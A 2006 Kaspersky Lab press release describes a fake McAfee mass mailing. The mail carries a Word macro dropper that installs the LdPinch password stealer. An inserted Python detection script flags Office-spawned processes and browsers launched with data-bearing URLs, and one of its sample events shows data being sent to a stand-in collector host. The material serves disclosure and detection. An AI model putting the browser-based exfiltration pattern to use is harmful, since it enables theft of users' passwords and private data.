Kaspersky Lab, Inc.

Malicious Mass Mailing Allegedly from McAfee. New Variants of Malicious Programs Circulating


Moscow, Russia -- (ReleaseWire) -- 11/03/2006 -- Kaspersky Lab has intercepted a mass-mailing containing Trojan-Dropper.MSWord.Lafool.v. This mass mailing is unusual as messages appeared to be sent from mcafee@europe.com and allegedly originated from McAfee, an antivirus company.

Lafool.v is a Word document called "McAfee Inc. Reports.doc". The file is 80,635 bytes in size, and allegedly contains a report about the propagation of malicious programs on the Internet.

The document contains a macro written in Visual Basic for Applications. Lafool.v extracts a new modification of LdPinch, a well-known password-stealing Trojan, from itself and launches it. LdPinch steals passwords to a number of services and applications, including AOL Instant Messenger and ICQ, as well as other confidential user data. Kaspersky Anti-Virus detects the new variant of this program as Trojan-PSW.Win32.LdPinch.bbg.

The Kaspersky Anti-Virus 6.0 and Kaspersky Internet Security Proactive Defense module will block the Trojan, including its attempts to:

1. execute a suspicious macro command
2. harvest personal data
3. start the Internet browser with command line parameters
4. send harvested data via the browser without the user's knowledge

The Trojan's activity is blocked if the user blocks at least one of these actions (LdPinch will either fail to start or will be unable to carry out its malicious payload). It should be noted that this technology for sending data without the user's knowledge was first implemented in the well-publicized PC Flank Leaktest (http://www.pcflank.com/pcflankleaktest.htm).
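Added example, not Kaspersky's code: the behaviour chain listed above (a macro-bearing document spawns a program, which then starts the browser with command-line parameters carrying data) expressed as a detection over process-creation events. The events, the process name dropped.exe and the collector.example URL are constructed for illustration.

```python
from urllib.parse import urlsplit

OFFICE = {"winword.exe"}                     # document host applications
BROWSERS = {"iexplore.exe", "firefox.exe"}   # assumed browser image names

# Constructed process-creation events, in creation order.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "winword.exe",
     "cmd": 'winword.exe "McAfee Inc. Reports.doc"'},
    {"pid": 300, "ppid": 200, "image": "dropped.exe", "cmd": "dropped.exe"},
    {"pid": 400, "ppid": 300, "image": "iexplore.exe",
     "cmd": "iexplore.exe http://collector.example/r.php?d=AAAA"},
    {"pid": 500, "ppid": 100, "image": "iexplore.exe",
     "cmd": "iexplore.exe http://www.example.com/"},
]

def url_argument(cmd):
    """Return the first http(s) URL passed on a command line, or None."""
    for token in cmd.split():
        token = token.strip('"')
        if token.lower().startswith(("http://", "https://")):
            return token
    return None

def find_chains(events):
    """Flag processes spawned by an Office app and any browser launched
    with a query-bearing URL by a descendant of that Office app."""
    by_pid, tainted, findings = {}, set(), []
    for ev in events:
        by_pid[ev["pid"]] = ev
        parent = by_pid.get(ev["ppid"])
        if not parent:
            continue
        from_office = parent["image"].lower() in OFFICE
        if not (from_office or parent["pid"] in tainted):
            continue  # ancestry does not include a document host
        tainted.add(ev["pid"])
        if ev["image"].lower() in BROWSERS:
            url = url_argument(ev["cmd"])
            if url and urlsplit(url).query:
                findings.append(("browser_with_data", ev["pid"], url))
        elif from_office:
            findings.append(("office_spawned_process", ev["pid"], ev["image"]))
    return findings

if __name__ == "__main__":
    for finding in find_chains(EVENTS):
        print(finding)
```

The browser started by explorer.exe (pid 500) is not flagged, because the rule keys on ancestry from the document host rather than on the browser launch alone.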

Kaspersky Lab believes that McAfee is in no way involved in the distribution of this Trojan and that the email address used in the messages (mcafee@europe.com) is fake and used in order to cause recipients to open infected messages.

An antivirus database update containing detection for Lafool.v was released on October 31st, 2006. Users of Kaspersky Anti-Virus are recommended to update their antivirus databases.

Users are also advised to be careful and refrain from opening messages from unknown senders and with suspicious attachments.

Additional information is available here:

Kaspersky Lab Information Service
10/1 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: +7 495 797 87 00
e-mail: timur.tsoriev@kaspersky.com
http://www.kaspersky.com; http://www.viruslist.com

Visit us online at www.kaspersky.com/press